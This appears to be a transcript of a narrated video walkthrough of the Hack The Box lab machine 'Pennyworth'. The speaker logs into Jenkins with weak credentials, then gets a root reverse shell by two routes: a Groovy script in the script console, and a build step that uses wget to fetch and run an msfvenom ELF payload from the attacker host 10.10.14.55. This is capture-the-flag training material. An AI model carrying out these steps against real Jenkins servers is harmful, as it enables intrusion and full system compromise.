All right, so our next video, I forget what number we're on. I think 16 or something like that. I might have already said 16. I don't remember. But it's going to be on Pennyworth. Okay, looks like we're attacking Jenkins on this one. Jenkins has a few ways to be able to get into it. Let's go ahead and copy this IP address. We'll start off with our RustScan here. We'll get rid of all this stuff that we've been working on. And then we'll go ahead and we'll hop over here. We will go ahead and we'll start off. So RustScan it. Still in tier 1. That's all right. All right, so it looks like port 8080 is up, which is normal for Jenkins. If we curl tac V that, we should see that is a Jenkins instance. Or we can see to fuck off because I didn't put 8080 in. There we go. Okay, authentication is required. And we do get a J session ID for some reason. Not really seeing actually that it is actually Jenkins. Yep, there it is, server Jetty. So we know that's 9.4.39 version, whatever that is. And does it actually want that like right there? What does the acronym CVE stand for? Oh, common vulnerability. Common vulnerabilities and exposures. There we go. I was about to say exploit. Common vulnerabilities and exposures. Wonder if it wants it in caps and stuff like that. Okay, cool. Task flag owned. What do three letters CIA mean? Does the CIA try? That's going to be confidentiality, integrity, and availability. Confidentiality, integrity, AVAIL, I 100% spelled availability wrong. I'm going to have to look that up. There we go. I think I spelled it right, like right there. I did. Nope. Google still said, hey, you're an idiot. There we go. Okay, what is the version of the service running on port 8? Oh, do I need the commas in there? Is that why? Confidentiality, integrity, availability. Okay. What is the version running? We saw that with our curl, right? So we did our curl, we saw that. So we see this like right here. I don't know if we need that jetty in there. Let's go ahead and look like real quick, see if we're supposed to put jetty in there. Looks like it actually. There we go. Okay. What version of Jenkins is right on target? Let's go ahead and find out. So let's go ahead and connect to that target like real quick. And we'll copy this. And we'll go ahead and we'll hop over to here and we'll fill that IP address in there. And we get HTTPS for some reason. It's supposed to be HTTP. Oh, 8080, my fault. There we go. 8080. Okay, now it wants us to figure out the version here. Let's try Control U. Maybe try to search for version. See if it says version in there. Not seeing anything. Let's go ahead and try admin, Jenkins, things like that. Try to log into it. Alright, so it looks like we're not logging in that easily, right? Not seeing a version anywhere for Jenkins, though. So now we got to try to figure out how are we going to get this version of Jenkins here. I'm not seeing anything over here also. So now it wants us to know the version, but I haven't really got anywhere for version. I wonder if ver is one of them. VER maybe? Control U. Ver? Nope, doesn't like ver either. Okay, so nothing there with those two. All right. But we will get in. The commas. Yeah, the commas. You actually spelled the comas. Even though I know I spelled availability wrong, I understand that a second ago. But now that I spelled that wrong, now I have to call someone else out for spelling something wrong. He's trying to tell me I was missing the commas, but he spelled it coma. There's a lot of people in comas. Oh, I spelled something wrong. Now I have to call somebody else for spelling something wrong. Haha. You know? How are we going to figure out what version it is? We could use a scanner, probably, right? I wonder if Droop Scan, I wonder if it actually has it on there. So there's a thing called Droop Scan, but you can put a whole bunch of different stuff into it. So if I go ahead and I do a tools Droop Scan. No, I'm just messing with you. I literally just spelled availability wrong. We do a Python, I think it's Droop Scan, right? I don't think I actually even need that. /Droop Scan. This is on GitHub, like right here. I wonder, can I scan Jenkins? Is that a thing? Is Jenkins one of them? Unrecognized arguments Jenkins. Okay, no. So Jenkins is not one that you can scan for that. Scan tech help. See what we can actually scan on it. Just so you guys know for future with Droop scan. It's made for Drupal. We scan our stuff in there. So it looks like Drupal, Joomla, Moodle, Silver Stripe, and WordPress. Okay. Which WP scan works just fine with WordPress, right? So, maybe what web? There we go. Cool. So what web? All right. So 2.289.1, right? So we got our version like right there. Okay. What type of script is accepted as input in Jenkins script console? Oh, it's some stupid name. It really is. Um, Groovy scripts are accepted by it. Oh, I just exited out of it. Damn it, Ryan. 1 second. Try to click back out and I exit out of it. Starting point. No, not silver rank. I don't care about that. Starting point. Okay. Yeah, it's Groovy. I think it's Groovy. Right? Yep, Groovy. Alright. What would the string command variable for the GroovyScript snippet be equal to if the target was running Windows? Like command.exe? Okay. What is the different command that IP, A, we would put to display our network interfaces information on Linux? Like ifconfig? No. For netcat to do with UDP? Oh, I never really did netcat with UDP. All right, I'm glad that grep helped out a lot. I don't know, you maybe? Yeah, you, tech you. I'll say if I was to make it, I would have done tech you. That makes sense to me. What is the term to describe making a target host initiate connection back to the attacker host, like a reverse shell? Then if you make them open a port, that's going to be a bind shell. All right, submit the root flag. Okay, so now we need to get into Jenkins somehow. We did nothing so far to actually get into Jenkins. We just need to now submit the root flag. So now we just need to try to figure out. Okay, so let's throw ahead. Let's just try some default credentials here, right? We already tried admin. We already tried Jenkins. Let's try root password and root tor, root. Okay, we're in. We're in with root password. Cool. Thank God. Let's say like we have done nothing so far to actually get into Jenkins. Probably if you're following their little write-up thing, that he probably already got in and actually did stuff. So let's go into the console. So we can actually look up Groovy scripts, right? And I believe I actually have them sitting on my notes over here. I think I have Jenkins and web. I don't know, it's pretty simple to attack Jenkins. Jenkins is one of the simpler ones to attack, so I may not have any notes on it at all. Command execution curl, no, I don't. So we can just look up Jenkins reverse shell into Google, and we got this pure groovy Java reverse shell, right? Now remember, this one's for Windows we can see because it's command.exe. So we just want to look up a Linux one, that's all. Linux. All right, then it should say bin bash. All right. And so we'll grab this one. Maybe this one, there's something here, this like little like run-up thing here. But yeah, Jenkins is pretty easy to attack. So we'll scroll down. And that one's still using Windows, okay? We're getting nowhere with this Linux one now, are we? Let's see what this guy shows us. That's command.exe. Where's the bin bash one? All right, so we just switch out command.exe for bin bash, I think. Yep, I think we just switch it out. So let's just go ahead and let's copy this whole thing right here. Whoops. I might, like where I have it in? I think it's actually in my, actually, I don't have it in web over here. I thought I did for some reason. XXS, curl. I thought I just put it in there not too long ago, but I guess not. We can actually, I think it's in my other notes, my cherry tree notes. If I look at web or whatever, I think it's underneath web or it's underneath Jenkins or something like that. I forget where it's actually at, but we'll find it here in a second. Let's go in web, Tomcat. It's so easy, I don't even freaking ever take notes of it. Whatever. Okay, so we'll grab that, right? We'll throw in Jenkins. We know that we're on a Linux machine with this link right here, okay? We go ahead, we go to manage Jenkins. We can go down to the script, or the Jenkins script console, okay? Go ahead and throw that into there. Oh, where'd it go? There we go. Control C, copy all that, throw that into here. And then what we could do is pretty much just change out the string command for /bin bash. And sometimes you do have to change these guys like right here, the parentheses, if they're like a weird way. What do you use for notes? I use Obsidian now. I used to use Cherry Tree, I use Obsidian now. And we'll just say yes here, 8044. Sure, why not? Okay. So we'll make a listening, tag LVMP 8044. And I also need my IP address. 10.10.14.55, okay? What we're going to do is we're going to go ahead and our string host is going to be that. It's not going to be localhost because obviously that will just run on literally localhost. So what we're trying to do is we're trying to get this guy to call back to us. And it looks like he did. And we are root. So cd/root, lstack.la. And we go ahead and cat that flag.txt. And there we go. That is Jenkins like right there. Like I said, super easy. Hardest part about it is actually logging in. There's more than just one way to actually be able to do that. Also, you can also go to build. You can also do a build and actually do it through there too. And I usually do that with Windows if I were to do it. But yeah, you can also build stuff and things like that on it. So let's go ahead and try it out with Linux. Let's see if we can't get like a bash reverse shell or something like that going with a build. So we'll go ahead and we'll hop over to here. Oh, as soon as you do it, I forgot. It like closes out, right? So I got to start this guy back up again, right? So let's say okay. And we'll go ahead and we'll spawn this machine again. We got to get that, grab that new IP address and everything like that. So we'll go ahead and actually probably exit out all this stuff. Exit out there too because we're not going to do Groovy script anymore. We'll show you guys how to do it within Build Manager to actually build it out and how to run different commands using build. Script console I find is much easier, much faster, but Build Manager you could also look at like what it ran last to see like, hey, like do you have any problems and things like that. So that's something you could do. And if we're root, we could do the same thing with the script manager with the script console, but we could like like put stuff into like cron tab, things like that, to make like a cron job to call back to us or whatever else. It's a little more noticeable though also. 8080. We'll go to root password. I actually have a box on Vagrant that utilizes Jenkins and is not fully set up yet. So you have to go in and find the Jenkins secret key, input that, and then get a reverse shell. And the Jenkins instance is internal. Pretty much you set it up. So we go to build, right? So we click on build history over here, right? Or actually it might be under, no, it's going to be under new item. Is it new item or manage Jenkins? All right, new item, and then we can build some freestyle project. Let's call it test. Freestyle, because that's how we roll, because we're freestyle kind of people. We'll say okay. We freestyle everything. All right, description, don't really care, blah, blah, okay. But build triggers, and then we go to add build step, okay. So we can execute shell or execute Windows bash command. We're obviously not on Windows like right now, so we got to execute a shell, right? And we're going to try like an ifconfig. Let's try something like that, right? I don't know if this is actually going to go to bin bash also. I have no idea to run this, right? And we can save that, and we can try to run it, okay? So we can go to build now, and we get this little check mark saying that, hey, it worked, right? So if we click on it, and we go to console output, we should have an ifconfig, and we do. Awesome, okay? Let's go back to build. Let's go back to our project over here, and let's try to get a reverse shell like this, right? So we'll go to, let's see here, configure, go down to our build, right? Our execute shell, and we'll go ahead and we'll look up scripts, bash reverse shell. Let's try something like this. What we could do is always have it call back to us, grab, so let's do that. Let's have it call back to us. Sounds like way more fun. Let's go with CD to desktop, starting point, MSF Venom, attack P. We're going to do a Linux. Hopefully it's 64-bit shell, reverse TCP, right? We'll do something like that, right? We'll do a attack or lhost equals my IP address, right? So I should be able to put in ton 0 or my actual IP address, 10.10.14.55. L port equals 445. Tac F, elf, shell.elf. We'll try to do something like this. Let's see if we can't do something like that, like right there. And like load that into there and stuff like that. They call for it. I think that'll be fun. Let's go and start up a Python server up here, right? And let's go ahead and see if we can't go ahead and do a wget HTTP 10.10.14.55 / shell.elf. Now, what if we could add a build step? Execute shell. I wonder if it'll run that, then run the next thing, because that'll be cool. If we could do like a quick change mode plus X for shell.elf, then add another build step, just do everything at once, right? Because that would be cool, I think. If not, then we're just going to have to keep going back to this. And then we can do a / shell.elf. And let's go ahead and start up a netcat listener on port 445. We can also use Metasploit for that, right? MSF console, which actually, no, that's a stageless payload. Yeah, it's stageless, okay. If it's stage payload, I would have to use it. Let's go ahead and save that. Let's try to build it. Let's see what happens. Build now. Okay, so this call back, and we do get it. Let's go. So that's another way to be able to do it. Or we can just do a bash reverse shell. As you see, it is trying to still build, but it already gave us our callback. So that's another way to be able to do it. Instead of just using the script console, you can also do that way. So maybe a script console, like, if you can't use it or something, I don't know. But that is going to be it for both the stream and also that last box, like right there. I think we have one more box after this one, which is a Windows machine. Yep, our last box for tier 1 is going to be tactics. We just finished up with Pennyworth, learned Jenkins, learned some, easy credentials. It does say that that's the default credentials. It is not for Jenkins. Default credentials for Jenkins is Jenkins. All right. We learned remote code execution on it, and we learned to use a Groovy script to be able to throw it in there. So thank you for watching, everybody. I'm going to go ahead and stop the recording.